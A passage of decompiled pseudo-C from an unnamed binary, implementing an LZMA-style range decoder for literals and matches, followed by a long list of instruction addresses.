															 *_t1199 = (0x800 - _t936 >> 5) + _t936;
															_t761 =  *(_t1426 + 0x24);
															asm("sbb ebx, ebx");
															 *(_t1426 + 0x28) =  *(_t1426 + 0x28) + 1;
															 *((char*)(_t761 +  *((intOrPtr*)(_t1426 + 0x38)))) =  *((intOrPtr*)((_t552 &  *(_t1426 + 0x3c)) -  *(_t1426 + 0x34) + _t761 +  *((intOrPtr*)(_t1426 + 0x38))));
															_t762 = _t761 + 1;
															 *(_t1426 + 0x24) = _t762;
															asm("sbb ecx, ecx");
															 *(_t1426 + 0x20) = (_t762 & 0xfffffffe) + 0xb;
															continue;
														}
													}
												} else {
													goto L234;
												}
											} else {
												_t507 = _t817;
												_t940 =  *((intOrPtr*)(_t1426 + 0x2c));
												 *((short*)(_t940 + 0x180 + _t1062 * 2)) = (0x800 - _t651 >> 5) + _t651;
												 *(_t1426 + 0x20) = _t1062 + 0xc;
												_t836 = _t940 + 0x664;
												L118:
												_t1063 =  *_t836 & 0x0000ffff;
												if(_t507 < 0x1000000) {
													_t751 =  *(_t1426 + 0x10);
													_t507 = _t507 << 8;
													_t1216 = _t1216 << 0x00000008 |  *_t751 & 0x000000ff;
													 *(_t1426 + 0x10) =  &(_t751[1]);
												}
												_t667 = (_t507 >> 0xb) * _t1063;
												if(_t1216 >= _t667) {
													_t508 = _t507 - _t667;
													_t1217 = _t1216 - _t667;
													 *_t836 = _t1063 - (_t1063 >> 5);
													_t1065 = _t836[1] & 0x0000ffff;
													if(_t508 < 0x1000000) {
														_t734 =  *(_t1426 + 0x10);
														_t508 = _t508 << 8;
														_t1217 = _t1217 << 0x00000008 |  *_t734 & 0x000000ff;
														 *(_t1426 + 0x10) =  &(_t734[1]);
													}
													_t672 = (_t508 >> 0xb) * _t1065;
													if(_t1217 >= _t672) {
														_t553 =  *(_t1426 + 0x10);
														_t509 = _t508 - _t672;
														_t1213 = _t1217 - _t672;
														_t836[1] = _t1065 - (_t1065 >> 5);
														_t1274 = 1;
														do {
															goto L155;
														} while (_t1274 < 0x100);
														goto L161;
													} else {
														_t565 = _t552 + _t552;
														_t836[1] = (0x800 - _t1065 >> 5) + _t1065;
														_t1148 =  *(_t836 + 0x106 + _t565 * 8) & 0x0000ffff;
														_t918 = _t836 + 0x104 + _t565 * 8;
														_t528 = _t672;
														if(_t672 < 0x1000000) {
															_t528 = _t672 << 8;
															_t732 =  *(_t1426 + 0x10);
															_t1217 = _t1217 << 0x00000008 |  *_t732 & 0x000000ff;
															 *(_t1426 + 0x10) =  &(_t732[1]);
														}
														_t721 = (_t528 >> 0xb) * _t1148;
														if(_t1217 >= _t721) {
															_t529 = _t528 - _t721;
															_t1217 = _t1217 - _t721;
															 *((short*)(_t918 + 2)) = _t1148 - (_t1148 >> 5);
															_t724 = 3;
														} else {
															_t529 = _t721;
															 *((short*)(_t918 + 2)) = (0x800 - _t1148 >> 5) + _t1148;
															_t724 = 2;
														}
														_t554 =  *(_t1426 + 0x10);
														_t1300 = _t724 + _t724;
														_t725 =  *(_t918 + _t1300) & 0x0000ffff;
														if(_t529 < 0x1000000) {
															_t529 = _t529 << 8;
															_t1217 = _t1217 << 0x00000008 |  *_t554 & 0x000000ff;
															_t554 = _t554 + 1;
															 *(_t1426 + 0x10) = _t554;
														}
														_t1152 = (_t529 >> 0xb) * _t725;
														if(_t1217 >= _t1152) {
															_t530 = _t529 - _t1152;
															_t1213 = _t1217 - _t1152;
															 *(_t918 + _t1300) = _t725 - (_t725 >> 5);
															_t1300 = _t1300 + 1;
														} else {
															_t530 = _t1152;
															 *(_t918 + _t1300) = (0x800 - _t725 >> 5) + _t725;
														}
														_t1276 = _t1300 + _t1300;
														_t675 =  *(_t918 + _t1276) & 0x0000ffff;
														if(_t530 < 0x1000000) {
															_t530 = _t530 << 8;
															_t1213 = _t1213 << 0x00000008 |  *_t554 & 0x000000ff;
															_t554 = _t554 + 1;
															 *(_t1426 + 0x10) = _t554;
														}
														_t1157 = (_t530 >> 0xb) * _t675;
														if(_t1213 >= _t1157) {
															_t509 = _t530 - _t1157;
															_t1213 = _t1213 - _t1157;
															_t675 = _t675 - (_t675 >> 5);
															 *(_t918 + _t1276) = _t675;
															_t1276 = _t1276 + 1;
														} else {
															_t509 = _t1157;
															 *(_t918 + _t1276) = (0x800 - _t675 >> 5) + _t675;
														}
													}
												} else {
													_t567 = _t552 + _t552;
													 *_t836 = (0x800 - _t1063 >> 5) + _t1063;
													_t1170 =  *(_t836 + 6 + _t567 * 8) & 0x0000ffff;
													_t919 = _t836 + 4 + _t567 * 8;
													_t531 = _t667;
													if(_t667 < 0x1000000) {
														_t531 = _t667 << 8;
														_t749 =  *(_t1426 + 0x10);
														_t1216 = _t1216 << 0x00000008 |  *_t749 & 0x000000ff;
														 *(_t1426 + 0x10) =  &(_t749[1]);
													}
													_t738 = (_t531 >> 0xb) * _t1170;
													if(_t1216 >= _t738) {
														_t532 = _t531 - _t738;
														_t1216 = _t1216 - _t738;
														 *((short*)(_t919 + 2)) = _t1170 - (_t1170 >> 5);
														_t741 = 3;
													} else {
														_t532 = _t738;
														 *((short*)(_t919 + 2)) = (0x800 - _t1170 >> 5) + _t1170;
														_t741 = 2;
													}
													_t1306 = _t741 + _t741;
													_t742 =  *(_t919 + _t1306) & 0x0000ffff;
													if(_t532 < 0x1000000) {
														_t1192 =  *(_t1426 + 0x10);
														_t532 = _t532 << 8;
														_t1216 = _t1216 << 0x00000008 |  *_t1192 & 0x000000ff;
														 *(_t1426 + 0x10) =  &(_t1192[1]);
													}
													_t1174 = (_t532 >> 0xb) * _t742;
													if(_t1216 >= _t1174) {
														_t533 = _t532 - _t1174;
														_t1213 = _t1216 - _t1174;
														 *(_t919 + _t1306) = _t742 - (_t742 >> 5);
														_t1306 = _t1306 + 1;
													} else {
														_t533 = _t1174;
														 *(_t919 + _t1306) = (0x800 - _t742 >> 5) + _t742;
													}
													_t1307 = _t1306 + _t1306;
													_t675 =  *(_t919 + _t1307) & 0x0000ffff;
													if(_t533 < 0x1000000) {
														_t1186 =  *(_t1426 + 0x10);
														_t533 = _t533 << 8;
														_t1213 = _t1213 << 0x00000008 |  *_t1186 & 0x000000ff;
														 *(_t1426 + 0x10) =  &(_t1186[1]);
													}
													_t1179 = (_t533 >> 0xb) * _t675;
													if(_t1213 >= _t1179) {
														_t509 = _t533 - _t1179;
														_t1213 = _t1213 - _t1179;
														_t675 = _t675 - (_t675 >> 5);
														 *(_t919 + _t1307) = _t675;
														_t1276 = _t1307 + 1 - 8;
													} else {
														_t509 = _t1179;
														 *(_t919 + _t1307) = (0x800 - _t675 >> 5) + _t675;
														_t1276 = _t1307 - 8;
													}
													_t554 =  *(_t1426 + 0x10);
												}
												L163:
												 *(_t1426 + 0x30) = _t1276;
												if( *(_t1426 + 0x20) < 0xc) {
													goto L237;
												}
											}
										} else {
											 *_t814 = (0x800 - _t648 >> 5) + _t648;
											_t1207 =  *((intOrPtr*)(_t1426 + 0x2c)) + 0xe6c;
											_t535 = _t1269;
											if( *(_t1426 + 0x28) != 0 ||  *(_t1426 + 0x4c) != 0) {
												_t770 =  *(_t1426 + 0x24);
												if(_t770 == 0) {
													_t770 =  *(_t1426 + 0x3c);
												}
												_t814 = ((( *(_t770 +  *((intOrPtr*)(_t1426 + 0x38)) - 1) & 0x000000ff) >> 8 -  *(_t1426 + 0x50)) + (( *(_t1426 + 0x28) &  *(_t1426 + 0x54)) <<  *(_t1426 + 0x50))) * 0x600;
												_t1207 = _t1207 + _t814;
											}
											_t774 =  *(_t1426 + 0x20);
											 *(_t1426 + 0x28) =  *(_t1426 + 0x28) + 1;
											_t577 =  *(_t1426 + 0x10);
											if(_t774 >= 7) {
												asm("sbb edx, edx");
												 *(_t1426 + 0x20) =  *(_t1426 + 0x20) - (_t814 & 0xfffffffd) + 6;
												asm("sbb ebx, ebx");
												_t951 = ( *((_t577 &  *(_t1426 + 0x3c)) -  *(_t1426 + 0x34) +  *(_t1426 + 0x24) +  *((intOrPtr*)(_t1426 + 0x38))) & 0x000000ff) + ( *((_t577 &  *(_t1426 + 0x3c)) -  *(_t1426 + 0x34) +  *(_t1426 + 0x24) +  *((intOrPtr*)(_t1426 + 0x38))) & 0x000000ff);
												_t780 = _t951 & 0x00000100;
												_t581 =  *(_t1207 + 0x202 + _t780 * 2) & 0x0000ffff;
												if(_t1269 < 0x1000000) {
													_t535 = _t1269 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1317 = (_t535 >> 0xb) * _t581;
												if(_t1213 >= _t1317) {
													_t536 = _t535 - _t1317;
													_t1213 = _t1213 - _t1317;
													 *(_t1207 + 0x202 + _t780 * 2) = _t581 - (_t581 >> 5);
													_t1320 = 3;
												} else {
													_t536 = _t1317;
													 *(_t1207 + 0x202 + _t780 * 2) = (0x800 - _t581 >> 5) + _t581;
													_t1320 = 2;
													_t780 =  !_t780;
												}
												_t781 = _t780 & 0x00000100;
												_t952 = _t951 + _t951;
												_t584 = _t781 & _t952;
												 *(_t1426 + 0x1c) = _t584;
												_t587 = _t1207 + (_t584 + _t781 + _t1320) * 2;
												 *(_t1426 + 0x18) = _t587;
												_t588 =  *_t587 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1320;
												if(_t536 < 0x1000000) {
													_t536 = _t536 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1323 = (_t536 >> 0xb) * _t588;
												if(_t1213 >= _t1323) {
													_t537 = _t536 - _t1323;
													_t1213 = _t1213 - _t1323;
													_t782 = _t781 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t588 - (_t588 >> 5);
													_t1328 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t537 = _t1323;
													 *( *(_t1426 + 0x18)) = (0x800 - _t588 >> 5) + _t588;
													_t1328 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t782 = _t781 &  !( *(_t1426 + 0x1c));
												}
												_t953 = _t952 + _t952;
												_t591 = _t782 & _t953;
												 *(_t1426 + 0x1c) = _t591;
												_t594 = _t1207 + (_t591 + _t782 + _t1328) * 2;
												 *(_t1426 + 0x18) = _t594;
												_t595 =  *_t594 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1328;
												if(_t537 < 0x1000000) {
													_t537 = _t537 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1331 = (_t537 >> 0xb) * _t595;
												if(_t1213 >= _t1331) {
													_t538 = _t537 - _t1331;
													_t1213 = _t1213 - _t1331;
													_t783 = _t782 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t595 - (_t595 >> 5);
													_t1336 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t538 = _t1331;
													 *( *(_t1426 + 0x18)) = (0x800 - _t595 >> 5) + _t595;
													_t1336 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t783 = _t782 &  !( *(_t1426 + 0x1c));
												}
												_t954 = _t953 + _t953;
												_t598 = _t783 & _t954;
												 *(_t1426 + 0x1c) = _t598;
												_t601 = _t1207 + (_t598 + _t783 + _t1336) * 2;
												 *(_t1426 + 0x18) = _t601;
												_t602 =  *_t601 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1336;
												if(_t538 < 0x1000000) {
													_t538 = _t538 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1339 = (_t538 >> 0xb) * _t602;
												if(_t1213 >= _t1339) {
													_t539 = _t538 - _t1339;
													_t1213 = _t1213 - _t1339;
													_t784 = _t783 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t602 - (_t602 >> 5);
													_t1344 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t539 = _t1339;
													 *( *(_t1426 + 0x18)) = (0x800 - _t602 >> 5) + _t602;
													_t1344 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t784 = _t783 &  !( *(_t1426 + 0x1c));
												}
												_t955 = _t954 + _t954;
												_t605 = _t784 & _t955;
												 *(_t1426 + 0x1c) = _t605;
												_t608 = _t1207 + (_t605 + _t784 + _t1344) * 2;
												 *(_t1426 + 0x18) = _t608;
												_t609 =  *_t608 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1344;
												if(_t539 < 0x1000000) {
													_t539 = _t539 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1347 = (_t539 >> 0xb) * _t609;
												if(_t1213 >= _t1347) {
													_t540 = _t539 - _t1347;
													_t1213 = _t1213 - _t1347;
													_t785 = _t784 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t609 - (_t609 >> 5);
													_t1352 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t540 = _t1347;
													 *( *(_t1426 + 0x18)) = (0x800 - _t609 >> 5) + _t609;
													_t1352 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t785 = _t784 &  !( *(_t1426 + 0x1c));
												}
												_t956 = _t955 + _t955;
												_t612 = _t785 & _t956;
												 *(_t1426 + 0x1c) = _t612;
												_t615 = _t1207 + (_t612 + _t785 + _t1352) * 2;
												 *(_t1426 + 0x18) = _t615;
												_t616 =  *_t615 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1352;
												if(_t540 < 0x1000000) {
													_t540 = _t540 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1355 = (_t540 >> 0xb) * _t616;
												if(_t1213 >= _t1355) {
													_t541 = _t540 - _t1355;
													_t1213 = _t1213 - _t1355;
													_t786 = _t785 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t616 - (_t616 >> 5);
													_t1360 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t541 = _t1355;
													 *( *(_t1426 + 0x18)) = (0x800 - _t616 >> 5) + _t616;
													_t1360 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t786 = _t785 &  !( *(_t1426 + 0x1c));
												}
												_t957 = _t956 + _t956;
												_t619 = _t786 & _t957;
												 *(_t1426 + 0x1c) = _t619;
												_t622 = _t1207 + (_t619 + _t786 + _t1360) * 2;
												 *(_t1426 + 0x18) = _t622;
												_t623 =  *_t622 & 0x0000ffff;
												 *(_t1426 + 0x14) = _t1360;
												if(_t541 < 0x1000000) {
													_t541 = _t541 << 8;
													_t1213 = _t1213 << 0x00000008 |  *( *(_t1426 + 0x10)) & 0x000000ff;
													 *(_t1426 + 0x10) =  *(_t1426 + 0x10) + 1;
												}
												_t1363 = (_t541 >> 0xb) * _t623;
												if(_t1213 >= _t1363) {
													_t542 = _t541 - _t1363;
													_t1213 = _t1213 - _t1363;
													_t787 = _t786 &  *(_t1426 + 0x1c);
													 *( *(_t1426 + 0x18)) = _t623 - (_t623 >> 5);
													_t1368 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14) + 1;
												} else {
													_t542 = _t1363;
													 *( *(_t1426 + 0x18)) = (0x800 - _t623 >> 5) + _t623;
													_t1368 =  *(_t1426 + 0x14) +  *(_t1426 + 0x14);
													_t787 = _t786 &  !( *(_t1426 + 0x1c));
												}
												_t961 = (_t957 + _t957 & _t787) + _t787 + _t1368;
												_t788 =  *(_t1207 + _t961 * 2) & 0x0000ffff;
												_t1208 = _t1207 + _t961 * 2;
												if(_t542 < 0x1000000) {
													_t975 =  *(_t1426 + 0x10);
													_t542 = _t542 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t975 & 0x000000ff;
													 *(_t1426 + 0x10) =  &(_t975[1]);
												}
												_t964 = (_t542 >> 0xb) * _t788;
												if(_t1213 >= _t964) {
													_t509 = _t542 - _t964;
													_t1213 = _t1213 - _t964;
													_t967 =  *(_t1426 + 0x24);
													 *_t1208 = _t788 - (_t788 >> 5);
													 *((char*)(_t967 +  *((intOrPtr*)(_t1426 + 0x38)))) = _t1368 + _t1368 + 1;
													 *(_t1426 + 0x24) = _t967 + 1;
												} else {
													_t509 = _t964;
													 *_t1208 = (0x800 - _t788 >> 5) + _t788;
													_t973 =  *(_t1426 + 0x24);
													 *((char*)(_t973 +  *((intOrPtr*)(_t1426 + 0x38)))) = _t1368 + _t1368;
													 *(_t1426 + 0x24) = _t973 + 1;
												}
											} else {
												_t977 = _t774;
												if(_t774 >= 4) {
													_t977 = 3;
												}
												 *(_t1426 + 0x20) = _t774 - _t977;
												_t793 =  *(_t1207 + 2) & 0x0000ffff;
												if(_t1269 < 0x1000000) {
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													_t535 = _t1269 << 8;
													 *(_t1426 + 0x10) = _t577;
												}
												_t980 = (_t535 >> 0xb) * _t793;
												if(_t1213 >= _t980) {
													_t543 = _t535 - _t980;
													_t1213 = _t1213 - _t980;
													 *(_t1207 + 2) = _t793 - (_t793 >> 5);
													_t795 = 3;
												} else {
													_t543 = _t980;
													 *(_t1207 + 2) = (0x800 - _t793 >> 5) + _t793;
													_t795 = 2;
												}
												_t1418 = _t795 + _t795;
												_t796 =  *(_t1207 + _t1418) & 0x0000ffff;
												if(_t543 < 0x1000000) {
													_t543 = _t543 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t985 = (_t543 >> 0xb) * _t796;
												if(_t1213 >= _t985) {
													_t544 = _t543 - _t985;
													_t1213 = _t1213 - _t985;
													 *(_t1207 + _t1418) = _t796 - (_t796 >> 5);
													_t1418 = _t1418 + 1;
												} else {
													_t544 = _t985;
													 *(_t1207 + _t1418) = (0x800 - _t796 >> 5) + _t796;
												}
												_t1419 = _t1418 + _t1418;
												_t798 =  *(_t1207 + _t1419) & 0x0000ffff;
												if(_t544 < 0x1000000) {
													_t544 = _t544 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t990 = (_t544 >> 0xb) * _t798;
												if(_t1213 >= _t990) {
													_t545 = _t544 - _t990;
													_t1213 = _t1213 - _t990;
													 *(_t1207 + _t1419) = _t798 - (_t798 >> 5);
													_t1419 = _t1419 + 1;
												} else {
													_t545 = _t990;
													 *(_t1207 + _t1419) = (0x800 - _t798 >> 5) + _t798;
												}
												_t1420 = _t1419 + _t1419;
												_t800 =  *(_t1207 + _t1420) & 0x0000ffff;
												if(_t545 < 0x1000000) {
													_t545 = _t545 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t995 = (_t545 >> 0xb) * _t800;
												if(_t1213 >= _t995) {
													_t546 = _t545 - _t995;
													_t1213 = _t1213 - _t995;
													 *(_t1207 + _t1420) = _t800 - (_t800 >> 5);
													_t1420 = _t1420 + 1;
												} else {
													_t546 = _t995;
													 *(_t1207 + _t1420) = (0x800 - _t800 >> 5) + _t800;
												}
												_t1421 = _t1420 + _t1420;
												_t802 =  *(_t1207 + _t1421) & 0x0000ffff;
												if(_t546 < 0x1000000) {
													_t546 = _t546 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t1000 = (_t546 >> 0xb) * _t802;
												if(_t1213 >= _t1000) {
													_t547 = _t546 - _t1000;
													_t1213 = _t1213 - _t1000;
													 *(_t1207 + _t1421) = _t802 - (_t802 >> 5);
													_t1421 = _t1421 + 1;
												} else {
													_t547 = _t1000;
													 *(_t1207 + _t1421) = (0x800 - _t802 >> 5) + _t802;
												}
												_t1422 = _t1421 + _t1421;
												_t804 =  *(_t1207 + _t1422) & 0x0000ffff;
												if(_t547 < 0x1000000) {
													_t547 = _t547 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t1005 = (_t547 >> 0xb) * _t804;
												if(_t1213 >= _t1005) {
													_t548 = _t547 - _t1005;
													_t1213 = _t1213 - _t1005;
													 *(_t1207 + _t1422) = _t804 - (_t804 >> 5);
													_t1422 = _t1422 + 1;
												} else {
													_t548 = _t1005;
													 *(_t1207 + _t1422) = (0x800 - _t804 >> 5) + _t804;
												}
												_t1423 = _t1422 + _t1422;
												_t806 =  *(_t1207 + _t1423) & 0x0000ffff;
												if(_t548 < 0x1000000) {
													_t548 = _t548 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													_t577 = _t577 + 1;
													 *(_t1426 + 0x10) = _t577;
												}
												_t1010 = (_t548 >> 0xb) * _t806;
												if(_t1213 >= _t1010) {
													_t549 = _t548 - _t1010;
													_t1213 = _t1213 - _t1010;
													 *(_t1207 + _t1423) = _t806 - (_t806 >> 5);
													_t1423 = _t1423 + 1;
												} else {
													_t549 = _t1010;
													 *(_t1207 + _t1423) = (0x800 - _t806 >> 5) + _t806;
												}
												_t1424 = _t1423 + _t1423;
												_t808 =  *(_t1207 + _t1424) & 0x0000ffff;
												if(_t549 < 0x1000000) {
													_t549 = _t549 << 8;
													_t1213 = _t1213 << 0x00000008 |  *_t577 & 0x000000ff;
													 *(_t1426 + 0x10) = _t577 + 1;
												}
												_t1015 = (_t549 >> 0xb) * _t808;
												if(_t1213 >= _t1015) {
													_t509 = _t549 - _t1015;
													_t1213 = _t1213 - _t1015;
													_t1018 =  *(_t1426 + 0x24);
													 *(_t1207 + _t1424) = _t808 - (_t808 >> 5);
													 *((char*)(_t1018 +  *((intOrPtr*)(_t1426 + 0x38)))) = _t1424 + 1;
													 *(_t1426 + 0x24) = _t1018 + 1;
												} else {
													_t509 = _t1015;
													 *(_t1207 + _t1424) = (0x800 - _t808 >> 5) + _t808;
													_t1024 =  *(_t1426 + 0x24);
													 *((char*)(_t1024 +  *((intOrPtr*)(_t1426 + 0x38)))) = _t1424;
													 *(_t1426 + 0x24) = _t1024 + 1;
												}
											}
											continue;
										}
										goto L258;
									}
									goto L253;
								}
								goto L249;
							}
							goto L258;
						}
					}
					L155:
					_t1275 = _t1274 + _t1274;
					_t675 =  *(_t836 + _t1275 + 0x204) & 0x0000ffff;
					if(_t509 < 0x1000000) {
						_t509 = _t509 << 8;
						_t1213 = _t1213 << 0x00000008 |  *_t553 & 0x000000ff;
						_t553 =  &(_t553[1]);
					}
					_t1069 = (_t509 >> 0xb) * _t675;
					if(_t1213 >= _t1069) {
						_t509 = _t509 - _t1069;
						_t1213 = _t1213 - _t1069;
						_t675 = _t675 - (_t675 >> 5);
						 *(_t836 + _t1275 + 0x204) = _t675;
						_t1274 = _t1275 + 1;
					} else {
						_t509 = _t1069;
						 *(_t836 + _t1275 + 0x204) = (0x800 - _t675 >> 5) + _t675;
					}
				}
			}

0x0040ebb8
0x0040ebb8
0x0040ebb8
0x0040ebc0
0x0040ebc0
0x0040ebc0
0x0040ebc2
0x0040ebcf
0x0040ebd7
0x0040ebda
0x0040ebdc
0x0040ebdc
0x0040ebe2
0x0040ebe7
0x0040ec01
0x0040ec03
0x0040ec0a
0x0040ec0c
0x0040ec14
0x0040ebe9
0x0040ebe9
0x0040ebf7
0x0040ebf7
0x0040ec1b
0x00000000
0x00000000
0x0040ec1d
0x0040ec1d
0x0040ec21
0x0040ec27
0x0040ec27
0x0040ec2b
0x0040ec2b
0x0040ec30
0x0040ec34
0x00000000
0x00000000
0x0040ec3a
0x0040ec3a
0x0040ec3f
0x0040ec41
0x0040ec41
0x0040ec4d
0x0040ec54
0x0040ec5d
0x0040ec65
0x0040ec68
0x0040ec6a
0x0040ec6b
0x0040ec6b
0x0040ec74
0x0040ec79
0x0040ec94
0x0040ec96
0x0040ec9f
0x0040eca3
0x0040ec7b
0x0040ec7b
0x0040ec89
0x0040ec8d
0x0040ec8d
0x0040eca8
0x0040ecab
0x0040ecb4
0x0040ecbc
0x0040ecbf
0x0040ecc1
0x0040ecc2
0x0040ecc2
0x0040eccb
0x0040ecd0
0x0040ece6
0x0040ece8
0x0040ecf1
0x0040ecf5
0x0040ecd2
0x0040ecd2
0x0040ece0
0x0040ece0
0x0040ecf6
0x0040ecf8
0x0040ed01
0x0040ed09
0x0040ed0c
0x0040ed0e
0x0040ed0f
0x0040ed0f
0x0040ed18
0x0040ed1d
0x0040ed33
0x0040ed35
0x0040ed3e
0x0040ed42
0x0040ed1f
0x0040ed1f
0x0040ed2d
0x0040ed2d
0x0040ed43
0x0040ed45
0x0040ed4e
0x0040ed56
0x0040ed59
0x0040ed5b
0x0040ed5c
0x0040ed5c
0x0040ed65
0x0040ed6a
0x0040ed80
0x0040ed82
0x0040ed8b
0x0040ed8f
0x0040ed6c
0x0040ed6c
0x0040ed7a
0x0040ed7a
0x0040ed90
0x0040ed92
0x0040ed9b
0x0040eda3
0x0040eda6
0x0040eda8
0x0040eda9
0x0040eda9
0x0040edb2
0x0040edb7
0x0040edcd
0x0040edcf
0x0040edd8
0x0040eddc
0x0040edb9
0x0040edb9
0x0040edc7
0x0040edc7
0x0040eddd
0x0040eddf
0x0040ede8
0x0040edf0
0x0040edf3
0x0040edf6
0x0040edf6
0x0040edff
0x0040ee04
0x0040ee1a
0x0040ee1c
0x0040ee25
0x0040ee29
0x0040ee06
0x0040ee06
0x0040ee14
0x0040ee14
0x0040ee2a
0x0040ee30
0x0040f09a
0x0040f0a2
0x0040f0aa
0x0040f0ae
0x0040f0b2
0x0040f0b6
0x0040f0b9
0x0040f0bf
0x0040f0e3
0x0040f218
0x0040f224
0x00000000
0x00000000
0x00000000
0x0040f0c1
0x0040f0c5
0x0040f0e9
0x0040f0ee
0x0040f0f2
0x0040f0f7
0x0040f0fa
0x00000000
0x0040f0c7
0x0040f0cf
0x0040f0d2
0x0040f0de
0x0040f0de
0x0040f0c5
0x0040ee36
0x0040ee38
0x0040ee3f
0x0040ee40
0x0040ee43
0x0040ee4a
0x0040eed6
0x0040eeda
0x0040eee0
0x0040eee5
0x0040eeed
0x0040eef0
0x0040eef2
0x0040eef2
0x0040eef3
0x0040eef5
0x0040eefc
0x0040eefe
0x0040ef04
0x0040ef06
0x0040ef06
0x0040ef09
0x0040ef0d
0x0040ef14
0x0040ef17
0x0040ef20
0x0040ef22
0x0040ef2a
0x0040ef2d
0x0040ef30
0x0040ef30
0x0040ef39
0x0040ef3e
0x0040ef5c
0x0040ef5e
0x0040ef67
0x0040ef6e
0x0040ef73
0x0040ef40
0x0040ef40
0x0040ef4e
0x0040ef55
0x0040ef55
0x0040ef76
0x0040ef79
0x0040ef86
0x0040ef92
0x0040ef95
0x0040ef97
0x0040ef97
0x0040efa0
0x0040efa5
0x0040efbf
0x0040efc1
0x0040efca
0x0040efd2
0x0040efd3
0x0040efa7
0x0040efa7
0x0040efb5
0x0040efb5
0x0040efd6
0x0040efd8
0x0040efe5
0x0040eff1
0x0040eff4
0x0040eff6
0x0040eff6
0x0040efff
0x0040f004
0x0040f01e
0x0040f020
0x0040f029
0x0040f031
0x0040f032
0x0040f006
0x0040f006
0x0040f014
0x0040f014
0x0040f035
0x0040f042
0x0040f04e
0x0040f051
0x0040f053
0x0040f053
0x0040f05c
0x0040f061
0x0040f07b
0x0040f07d
0x0040f086
0x0040f08e
0x0040f063
0x0040f063
0x0040f071
0x0040f071
0x0040f094
0x0040f198
0x0040f1a0
0x0040f1a5
0x0040f1a5
0x0040f1ae
0x0040f1b6
0x0040f1b9
0x0040f1bb
0x0040f1bb
0x0040f1bc
0x0040f1c0
0x0040f1c7
0x0040f1ce
0x0040f1d5
0x0040f1dc
0x0040f1e4
0x0040f1eb
0x0040f1ee
0x0040f1f6
0x0040f1fe
0x0040f201
0x0040f20a
0x00000000
0x00000000
0x00000000
0x0040ee50
0x0040ee50
0x0040ee52
0x0040ee57
0x0040ee63
0x0040ee70
0x0040ee70
0x0040ee79
0x0040ee85
0x0040ee88
0x0040ee8a
0x0040ee8a
0x0040ee93
0x0040ee98
0x0040eeb0
0x0040eeb2
0x0040eebb
0x0040eebf
0x0040eec3
0x0040ee9a
0x0040ee9a
0x0040eea8
0x0040eeac
0x0040eeac
0x0040eec7
0x0040eecb
0x0040eecb
0x0040eecb
0x00000000
0x0040eed1
0x0040ee4a
0x00000000
0x0040f0fe
0x0040f102
0x0040f106
0x0040f109
0x0040f10b
0x0040f22e
0x0040f23a
0x0040f111
0x0040f113
0x0040f115
0x0040f115
0x0040f11f
0x0040f125
0x0040f12f
0x0040f133
0x0040f139
0x0040f15c
0x0040f160
0x0040f163
0x0040f166
0x0040f167
0x0040f16c
0x0040f16e
0x0040f16e
0x0040f170
0x0040f170
0x0040f173
0x0040f13b
0x0040f141
0x0040f145
0x0040f147
0x0040f14a
0x0040f150
0x0040f153
0x0040f155
0x0040f156
0x00000000
0x0040f177
0x0040f18b
0x0040f18f
0x0040dea5
0x0040deb2
0x0040deb5
0x0040debd
